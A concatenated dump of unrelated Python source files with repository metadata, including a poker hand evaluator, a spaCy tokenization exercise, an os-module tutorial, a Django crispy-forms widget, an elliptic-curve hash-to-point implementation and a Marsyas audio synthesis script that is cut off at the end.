for card in hand[0:4]:
if hand[c1] - card == 1:
pass
else:
return []
c1 += 1
hand = [list(card_values.keys())[list(card_values.values()).index(card)] for card in hand]
return [hand[4]]
def four_of_a_kind(hand, suits):
for card in hand:
if hand.count(card) > 3:
return card
return []
def full_house(hand, suits):
hand_check = hand.copy()
high_cards = []
for card in hand_check:
if hand_check.count(card) > 2:
high_cards.append(card)
while card in hand_check:
hand_check.remove(card)
break
else:
return []
for card in hand_check:
if hand_check.count(card) > 1:
return high_cards
else:
return []
def flush(hand, suits):
if len(suits) == 1:
hand.sort()
return [hand[4]]
else:
return []
def straight(hand, suits):
low_values = ["A", "2", "3", "4", "5"]
for value in low_values:
if value in hand:
pass
else:
break
else:
return ["5"]
hand = [card_values[card] for card in hand]
hand.sort()
c1 = 1
for card in hand[0:4]:
if int(hand[c1]) - int(card) == 1:
pass
else:
return []
c1 += 1
hand = [list(card_values.keys())[list(card_values.values()).index(card)] for card in hand]
return hand[4]
def three_of_a_kind(hand, suits):
for card in hand:
if hand.count(card) > 2:
return card
return []
def two_pair(hand, suits):
hand_check = hand.copy()
hand_check = [card_values[card] for card in hand]
counter = 0
high_cards = []
for card in hand_check:
if hand_check.count(card) > 1:
counter += 1
high_cards.append(card)
while card in hand_check:
hand_check.remove(card)
if counter == 2:
high_cards.sort()
high_cards = [list(card_values.keys())[list(card_values.values()).index(card)] for card in high_cards]
return high_cards
return []
def one_pair(hand, suits):
for card in hand:
if hand.count(card) > 1:
return card
return []
def high_card(hand, suits):
highest = 2
for card in hand:
high_card = card_values[card]
if high_card > highest:
highest = high_card
highest_card = card
return highest_card
def winning_hand(h1, s1, h2, s2):
check_1 = royal_flush(h1, s1)
check_2 = royal_flush(h2, s2)
if len(check_1) > 0:
return True
elif len(check_2) > 0:
return False
else:
check_1 = straight_flush(h1, s1)
check_2 = straight_flush(h2, s2)
#Royal Flush to Straight Flush
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = four_of_a_kind(h1, s1)
check_2 = four_of_a_kind(h2, s2)
#Straight Flush to Four of a Kind
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = full_house(h1, s1)
check_2 = full_house(h2, s2)
#Four of a Kind to Full House
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = flush(h1, s1)
check_2 = flush(h2, s2)
#Full House to Flush
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = straight(h1, s1)
check_2 = straight(h2, s2)
#Flush to Straight
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = three_of_a_kind(h1, s1)
check_2 = three_of_a_kind(h2, s2)
#Straight to Three of a Kind
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
else:
return False
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = two_pair(h1, s1)
check_2 = two_pair(h2, s2)
#Three of a Kind to Two Pair
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1[1]] > card_values[check_2[1]]:
return True
elif card_values[check_2[1]] > card_values[check_1[1]]:
return False
elif card_values[check_1[0]] > card_values[check_2[0]]:
return True
elif card_values[check_2[0]] > card_values[check_1[0]]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
for term in check_1:
while term in h1_copy:
h1_copy.remove(term)
for term in check_2:
while term in h2_copy:
h2_copy.remove(term)
check_1 = one_pair(h1_copy, s1)
check_2 = one_pair(h2_copy, s2)
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
return None
else:
return True
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = one_pair(h1, s1)
check_2 = one_pair(h2, s2)
#Two Pair to One Pair
if len(check_1) > 0:
if len(check_2) > 0:
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
h1_copy = h1.copy()
h2_copy = h2.copy()
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
for x in range(0,3):
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
else:
return True
elif len(check_2) > 0:
return False
else:
check_1 = high_card(h1, s1)
check_2 = high_card(h2, s2)
#One Pair to High Card
h1_copy = h1.copy()
h2_copy = h2.copy()
for x in range(0,5):
if card_values[check_1] > card_values[check_2]:
return True
elif card_values[check_2] > card_values[check_1]:
return False
else:
while check_1 in h1_copy:
h1_copy.remove(check_1)
while check_2 in h2_copy:
h2_copy.remove(check_2)
check_1 = high_card(h1_copy, s1)
check_2 = high_card(h2_copy, s2)
win1_list = 0
for row in content:
if len(row) == 0:
continue
hand_1 = [card for card in row[0:10:2]]
suits_1 = {card for card in row[1:11:2]}
hand_2 = [card for card in row[10::2]]
suits_2 = {card for card in row[11::2]}
#print (hand_1, hand_2)
#print (suits_1, suits_2)
winner_1 = winning_hand(hand_1, suits_1, hand_2, suits_2)
#print (winner_1)
#print ()
if winner_1 is True:
win1_list += 1
print (win1_list)
poker_file.close()
| 30.417867 | 123 | 0.499005 |
c18f66e59681c1445680e3e28e060eb30be673e1
| 294 |
py
|
Python
|
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | 2 |
2020-07-07T01:46:37.000Z
|
2021-04-20T03:19:43.000Z
|
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/zh/solution_01_03_02.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
# 导入spacy并创建中文nlp对象
import spacy
nlp = spacy.blank("zh")
# 处理文本
doc = nlp("我喜欢老虎和狮子。")
# 遍历打印doc中的内容
for i, token in enumerate(doc):
print(i, token.text)
# 截取Doc中"老虎"的部分
laohu = doc[2:3]
print(laohu.text)
# 截取Doc中"老虎和狮子"的部分(不包括"。")
laohu_he_shizi = doc[2:5]
print(laohu_he_shizi.text)
| 14.7 | 31 | 0.693878 |
e75ac09c2a77743163fc9a7eef60621ee4d5f737
| 73 |
py
|
Python
|
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 1 |
2021-12-18T15:29:24.000Z
|
2021-12-18T15:29:24.000Z
|
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | null | null | null |
geek/geek2.py
|
lcarlin/guppe
|
a0ee7b85e8687e8fb8243fbb509119a94bc6460f
|
[
"Apache-2.0"
] | 3 |
2021-08-23T22:45:20.000Z
|
2022-02-17T13:17:09.000Z
|
curso = 'Programacao em Python Essencial'
def funcao2():
return curso
| 24.333333 | 41 | 0.739726 |
99c5a029da3e80813cafe7ce1eafb5c5709261cd
| 1,442 |
py
|
Python
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | 2 |
2020-03-28T13:56:39.000Z
|
2020-03-29T10:16:12.000Z
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | 76 |
2020-03-27T21:53:04.000Z
|
2020-03-30T20:27:43.000Z
|
backend/apps/iamstudent/custom_crispy.py
|
match4healthcare/match4healthcare
|
acf69e3b781d715f0a947c2a9df6646e94f1ca6b
|
[
"MIT"
] | null | null | null |
from crispy_forms.bootstrap import Field
from crispy_forms.utils import TEMPLATE_PACK
class InputButtonGroup(Field):
"""
Layout object for rendering radio and checkbox elements as button groups::.
RadioButtons('field_name', [option_label_class="btn blue text-white btn-lg"])
"""
template = "%s/layout/input_buttongroup.html"
def __init__(self, *args, **kwargs):
try:
self.input_type
except AttributeError:
raise NotImplementedError(
"Cannot instantiate {}. input_type property must be set".format(
type(self).__name__
)
)
self.option_label_class = "btn btn-secondary"
if "option_label_class" in kwargs:
self.option_label_class = kwargs.pop("option_label_class")
return super(InputButtonGroup, self).__init__(*args, **kwargs)
def render(self, form, form_style, context, template_pack=TEMPLATE_PACK, **kwargs):
return super(InputButtonGroup, self).render(
form,
form_style,
context,
template_pack=template_pack,
extra_context={
"input_type": self.input_type,
"option_label_class": self.option_label_class,
},
)
class RadioButtons(InputButtonGroup):
input_type = "radio"
class CheckboxButtons(InputButtonGroup):
input_type = "checkbox"
| 29.428571 | 87 | 0.627601 |
823f28c32d2bd546b4cbff92817ad336d78d019e
| 1,537 |
py
|
Python
|
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
src/python3_learn_video/os_module.py
|
HuangHuaBingZiGe/GitHub-Demo
|
f3710f73b0828ef500343932d46c61d3b1e04ba9
|
[
"Apache-2.0"
] | null | null | null |
"""
模块是一个包含所有你定义的函数和变量的文件,其后缀名是.py
模块可以被别的程序引入,以使用该模块中的函数等功能
OS:Operation System 操作系统
"""
import os
print('-------------------------------')
print(os.getcwd()) # 获取当前的目录位置
print('-------------------------------')
os.chdir('E:\\') # 改变当前目录位置
print(os.getcwd())
print('-------------------------------')
print(os.listdir('E:\\')) # 打印当前目录下包含的文件和文件夹
print('-------------------------------')
# os.mkdir('E:\\A') # 创建文件夹
# os.mkdir('E:\\A\\B') # 创建已存在的级联文件夹
# os.makedirs('E:\\B\\C') # 创建级联文件夹
# os.makedirs('E:\\B\\A') # 创建级联文件夹
# os.system('cmd') # 打开cmd
# os.system('calc') # 打开计算器
print(os.curdir) # 当前路径
print(os.listdir(os.curdir)) # 查看当前路径下的文件和文件夹
print('-------------------------------')
print(os.path.basename('E:\\oracle\\hosts')) # 去除路径返回文件名
print('-------------------------------')
print(os.path.dirname('E:\\oracle\\hosts')) # 去除文件名返回路径
print('-------------------------------')
print(os.path.join('A', 'B', 'C'))
print(os.path.join(r'C:\\', 'A', 'B', 'C'))
print(os.path.split('E:\\A\\SEXY.AVI'))
print(os.path.split('E:\\A\\B\\C'))
print('-------------------------------')
print(os.path.splitext('E:\\A\\SEXY.AVI')) # 获取后缀
print('-------------------------------')
print(os.path.getatime('E:\\test.txt'))
import time
print(time.gmtime(os.path.getatime('E:\\test.txt')))
print('-------------------------------')
print(time.localtime(os.path.getatime('E:\\test.txt')))
print('-------------------------------')
print(time.localtime(os.path.getmtime('E:\\test.txt')))
print('-------------------------------')
| 26.964912 | 57 | 0.476252 |
41a74400b4de35df5aeeefe5d76a35e9bb6146d7
| 2,084 |
py
|
Python
|
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/scripts/Python/make-bextract-splits.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
#!/global/scratch/sness/openmir/tools/python/bin/python
#
#
#
import sys
import os
import datetime
import commands
import re
import time
import simplejson as json
import random
import pprint
pp = pprint.PrettyPrinter(indent=4)
def run(inFilename,outPrefix,numFolds):
inFile = open(inFilename, "r")
line = inFile.readline()
data = {}
while line:
m = re.search('(.*)\t(.*)', line)
if m is not None:
filename = m.group(1)
label = m.group(2)
if label not in data:
data[label] = []
data[label].append(filename)
line = inFile.readline()
# Randomly shuffle folds
for label in data:
random.shuffle(data[label])
# Make new data structure divided into folds
folds = {}
for i in range(0,numFolds):
folds[i] = {}
for label in data:
folds[i][label] = []
# Create folds from data
fold = 0
for label in data:
while data[label]:
popped = data[label].pop()
folds[fold][label].append(popped)
fold += 1
if fold >= numFolds:
fold = 0
# Write data to files
for i in range(0,numFolds):
trainFile = open("%s-train-%i" % (outPrefix,i), "w")
testFile = open("%s-test-%i" % (outPrefix,i), "w")
for j in range(0,numFolds):
for label in folds[j]:
for item in folds[j][label]:
if j == i:
testFile.write("%s\t%s\n" % (item,label))
else:
trainFile.write("%s\t%s\n" % (item,label))
trainFile.close()
testFile.close()
if __name__ == "__main__":
if len(sys.argv) < 3:
print "Usage: thesis-make-bextract-obv-splits.py bextract.mf prefix- numFolds"
sys.exit(1)
inFilename = sys.argv[1]
outPrefix = sys.argv[2]
numFolds = int(sys.argv[3])
run(inFilename,outPrefix,numFolds)
| 24.232558 | 86 | 0.518234 |
d43169921a12e287804bfbe3ee39625b50cfcf93
| 303 |
py
|
Python
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/strenum.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
"""
strenum contains an enum that inherits from the plain enum and string.
"""
from enum import Enum
# pylint: disable=too-few-public-methods
class StrEnum(str, Enum):
"""
An enum that has string values.
"""
# see https://docs.python.org/3/library/enum.html?highlight=strenum#others
| 20.2 | 78 | 0.69637 |
9931776b61aedd8331ad2a90cae76c20aba15482
| 276 |
py
|
Python
|
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
demo.py
|
tlee753/sharing-sequence
|
1aae08b5eacefd9b3d88e5befe2453151210922c
|
[
"MIT"
] | null | null | null |
import sys
def demo(x):
output = "AB"
for i in range(x):
temp = ""
for l in output:
if (l == 'A'):
temp += "AB"
else:
temp += "BA"
output = temp
print(output)
demo(int(sys.argv[1]))
| 17.25 | 28 | 0.394928 |
993db96065f109d3d5d76b32a4d8be59528b6cb1
| 383 |
py
|
Python
|
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
Weboffice/woa_contacts/models/crm_phonecall.py
|
whoedl61/webinaroctubre
|
a22048838062999753860995d21328cb9d53d652
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from functools import reduce
from odoo import api, fields, models, _
class CrmPhonecall(models.Model):
_inherit = 'crm.phonecall'
sale_order_ids = fields.Many2one(
comodel_name='sale.order',
)
class CrmPhonecall2(models.Model):
_inherit = 'crm.phonecall'
crm_lead_ids = fields.Many2one(
comodel_name='crm.lead',
)
| 20.157895 | 39 | 0.668407 |
51e0e33ddbe206b0d56ce2aab6123557e1a4198f
| 1,435 |
py
|
Python
|
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
Utils/py/RL_ActionSelection/env_0/env.py
|
tarsoly/NaoTH
|
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
#################################
# #
# /\/\/\/\/\/\/\/\/\/\/\/\ #
# \/\/\/\/\/\/\/\/\/\/\/\/ #
# #
# Environment wrapper #
# #
# /\/\/\/\/\/\/\/\/\/\/\/\ #
# \/\/\/\/\/\/\/\/\/\/\/\/ #
# #
#################################
import gym # import gym for action spaces
from rl import core # import Keras reinforcement learning
import numpy as np
import world
class Env(core.Env):
# Environment class
# build as needed for keras-rl (https://github.com/keras-rl/keras-rl/blob/master/rl/core.py)
reward_range = (-np.inf, np.inf)
action_space = gym.spaces.Discrete(5)
observation_space = gym.spaces.MultiBinary(872) # type: MultiBinary TODO: make derivable
def __init__(self, reward, features):
# reward and features are function, for further details see world class
self.world = world.World(reward, features)
def step(self, action=None):
next_state, reward, done, info = self.world.step(action)
return next_state, reward, done, info
def render(self):
# implement maybe in the futur
# visualize traces and agent movement on field
self.world.render()
def close(self):
self.world.close()
def reset(self):
observation = self.world.reset()
return observation
| 29.285714 | 96 | 0.510801 |
7a63c3d9ac53f87b8ddb8e62f13c5bfc49d13609
| 8,366 |
py
|
Python
|
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
fspke/icarthash.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017, Joseph deBlaquiere <[email protected]>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import fspke.rabinmiller as rabinmiller
from fspke.cwhash import CWHashFunction
from ecpy.point import Point, Generator
from Crypto.Random import random
def _modinv(a, m):
# Extended Euclidean Algorithm for finding inverse
lastr, r, x, lastx = a, m, 0, 1
while r:
lastr, (q, r) = r, divmod(lastr, r)
x, lastx = lastx - q*x, x
return lastx % m
class IcartHash (object):
"""IcartHash uses the method proposed by Thomas Icart(1) and extended by
Eric Brier et. al.(2) to hash a N-bit integer value into to a elliptic
curve group defined over a finite field, E(Fp), where 2**N > q and E is
in the Short Weierstrass for y**2 = x**3 + ax + b with Generator G and
order n.
(1) : Thomas Icart, "How to Hash into Elliptic Curves", CRYPTO2009,
https://eprint.iacr.org/2009/226.pdf
(2) : Eric Brier et. al., "Efficient Indifferentiable Hashing into
Ordinary Elliptic Curves", CRYPTO2010,
https://eprint.iacr.org/2009/340.pdf
"""
def __init__(self, q, a, b, G, n):
""""""
if (q != int(q)) or (q < 3):
raise ValueError("Invalid Input: q should be a positive integer")
if (a != int(a)) or (a < 0):
raise ValueError("Invalid Input")
if (b != int(b)) or (b < 0):
raise ValueError("Invalid Input")
if rabinmiller.isPrime(q) is not True:
raise ValueError("Invalid Input: q must be prime")
if (q % 3) != 2:
raise ValueError("Invalid Input: q must be congruent to 2 (mod 3)")
if (len(G) != 2):
raise ValueError("Invalid Input: G must be a tuple (dimension 2)")
if (G[0] != int(G[0])) or (G[0] < 0):
raise ValueError("Invalid Input")
if (G[1] != int(G[1])) or (G[1] < 0):
raise ValueError("Invalid Input")
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
self.q = int(q)
self.a = int(a)
self.b = int(b)
self.curve = {"p": self.q,
"bits": self.q.bit_length(),
"n": int(n),
"a": self.a,
"b": self.b,
"G": (G[0], G[1])}
# print("curve =", self.curve)
self.G = Generator.init(G[0], G[1], curve=self.curve)
# precalculate some constants (inverses of 3, 2, 27) in Fq
self._3inv = pow(3, self.q - 2, self.q)
# print("_3inv =", self._3inv)
assert ((3 * self._3inv) % self.q) == 1
self._cubeRtExp = _modinv(3, self.q - 1)
# print("_cubeRtExp =", self._3inv)
assert ((3 * self._cubeRtExp) % (self.q-1)) == 1
self._27inv = pow(27, self.q - 2, self.q)
# print("_27inv =", self._27inv)
assert ((27 * self._27inv) % self.q) == 1
self._3a = (3 * a) % self.q
# set up H1, H2 as two random uniform hash functions based on
# the Carter and Wegman construction
self.H1 = CWHashFunction(self.q)
self.H2 = CWHashFunction(self.q)
def serialize(self):
config = {}
config['q'] = self.q
config['a'] = self.a
config['b'] = self.b
config['G'] = (self.G.affine()[0], self.G.affine()[1])
config['n'] = self.curve['n']
config['H1'] = self.H1.serialize()
config['H2'] = self.H2.serialize()
return config
@staticmethod
def deserialize(config):
H = IcartHash(config['q'], config['a'], config['b'],
config['G'], config['n'])
H.H1 = CWHashFunction.deserialize(config['H1'])
H.H2 = CWHashFunction.deserialize(config['H2'])
return H
def _cubeRoot(self, x):
return pow(x, self._cubeRtExp, self.q)
def deterministicMap(self, n):
"""Using the original algorithm proposed by Thomas Icart, calculates
a point on E(Fq) assuming n is a member of Fq. H(0) is mapped to O
(point at infinity). Points are calculated in affine coordinates and
returned as a Point Object.
Note: deterministicMap reliably maps Fq to E(Fq), but as not all points
on the curve can be parameterized, the results are not uniform and the
distribution is differentiable from a collection of random points
"""
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
if n == 0:
return Point(infinity=True, curve=self.curve)
# just to be sure, force x to be a member of Fq
u = int(n) % self.q
# print("u = ", u)
u6_inv = pow((6 * u) % self.q, self.q - 2, self.q)
assert ((6 * u * u6_inv) % self.q) == 1
v = ((self._3a - pow(u, 4, self.q)) * u6_inv) % self.q
u_6 = pow(u, 6, self.q)
# print ("u_6 =", u_6)
# print ("27_inv =", self._27inv)
u_6o27 = (pow(u, 6, self.q) * self._27inv) % self.q
assert ((u_6o27 * 27) % self.q) == u_6
foo = ((pow(v, 2, self.q) - self.b) - u_6o27) % self.q
# print ("foo = ", foo)
curootfoo = self._cubeRoot(foo)
# print ("curootfoo = ", curootfoo)
assert(pow(curootfoo, 3, self.q) == foo)
u_2 = pow(u, 2, self.q)
u_2o3 = (pow(u, 2, self.q) * self._3inv) % self.q
assert ((u_2o3 * 3) % self.q) == u_2
x = (curootfoo + u_2o3) % self.q
y = ((u * x) + v) % self.q
return Point(x, y, infinity=False, curve=self.curve)
def uniformMap(self, n):
"""UniformMap maps values from Fq to E(Fq) in a uniform manner by
elliptic curve point multiplication. While this does produce a uniform
mapping within the ring of the generator point, using this map exposes
the discrete logarithm of the resultant point (as log.G = n).
"""
if (n != int(n)) or (n < 0):
raise ValueError("Invalid Input")
if n == 0:
return Point(infinity=True, curve=self.curve)
# just to be sure, force x to be a member of Fq
u = int(n) % self.q
return (self.G * u)
def hashval(self, n):
"""hashval calculates a secure, uniform hash from an N-bit input
by using two Universal Hash functions to hash from {0,1}**N -> Fp
and the summing the results of mapping these values using the
deterministic (Icart) map and the uniform (E.C. Point Multiplication)
mappings.
hashval takes an integer as input and returns the compressed
representation of the point as a string.
"""
h = (self.deterministicMap(self.H1.hashval(n)) +
self.uniformMap(self.H2.hashval(n)))
if h.is_infinite:
return ('0' * (2 + ((self.curve['bits'] + 7) // 8)), True)
else:
return (h.compress().decode(), False)
| 43.34715 | 80 | 0.596701 |
710180788e46fb9672dd2581b521808730d01041
| 347 |
py
|
Python
|
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/ticket/__init__.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.ticket.handler import Handler, HandlerRegistry
handlers = HandlerRegistry() # noqa
from onegov.ticket.model import Ticket
from onegov.ticket.model import TicketPermission
from onegov.ticket.collection import TicketCollection
__all__ = [
'Handler',
'handlers',
'Ticket',
'TicketCollection',
'TicketPermission'
]
| 21.6875 | 58 | 0.755043 |
a4548570e9100b45dc7f3ed1d57f183d03d53890
| 2,624 |
py
|
Python
|
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/marsyas_python/chuck_like.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
import marsyas
import random
import math
def mtof(pitch):
return 440.0 * math.pow(2.0, (pitch-69.0) / 12.0)
def set_freq(control, freq):
control.setValue_real(freq)
def dispatch(time, times, f, control, freq):
if (len(times) > 0):
if (time > times[0]):
f(control,freq)
del times[0]
def build_network():
# Assemble the network
mng = marsyas.MarSystemManager()
pnet = mng.create("Series", "pnet")
voices = mng.create("Fanout", "voices");
voices.addMarSystem(mng.create("SineSource", "src1"));
filt_noise = mng.create("Series", "filt_noise");
filt_noise.addMarSystem(mng.create("NoiseSource", "src2"));
filt_noise.addMarSystem(mng.create("Biquad", "biquad"));
filt_noise.updControl("Biquad/biquad/mrs_real/frequency", marsyas.MarControlPtr.from_real(400.0));
voices.addMarSystem(filt_noise);
mix = mng.create("Sum", "mix")
gain = mng.create("Gain", "gain")
dest = mng.create("AudioSink", "dest")
pnet.addMarSystem(voices)
pnet.addMarSystem(mix)
pnet.addMarSystem(gain)
pnet.addMarSystem(dest)
pnet.linkControl("mrs_real/f1",
"Fanout/voices/SineSource/src1/mrs_real/frequency");
pnet.linkControl("mrs_real/f2",
"Fanout/voices/Series/filt_noise/Biquad/biquad/mrs_real/frequency");
pnet.updControl("mrs_real/israte",
marsyas.MarControlPtr.from_real(44100.0))
pnet.updControl("AudioSink/dest/mrs_bool/initAudio",
marsyas.MarControlPtr.from_bool(True))
return pnet
pnet = build_network()
bufferSize = pnet.getControl("mrs_natural/inSamples").to_natural();
srate = pnet.getControl("mrs_real/osrate").to_real();
tstep = bufferSize * 1.0 / srate
f1 = pnet.getControl("mrs_real/f1")
f2 = pnet.getControl("mrs_real/f2")
# Bohlen/Pierce scale
ratios = [ 1, 25.0/21, 9.0/7, 7.0/5, 5./3, 9./5, 15./7, 7./3, 25./9, 3./1]
frequencies = [x * 440 for x in ratios]
times1 = [x * 0.8 for x in ratios] # event times
times2 = [x * 0.2 for x in range(1, 100)]
time = 0; # time in seconds
while(time < 6.0):
# dispatch(time, times1, set_freq, f1, frequencies[random.randint(1,len(frequencies)-1)])
dispatch(time, times2, set_freq, f1, mtof(math.fabs(math.sin(time) * 110)))
pnet.tick()
time = time + tstep
pnet.updControl("AudioSink/dest/mrs_bool/mute",
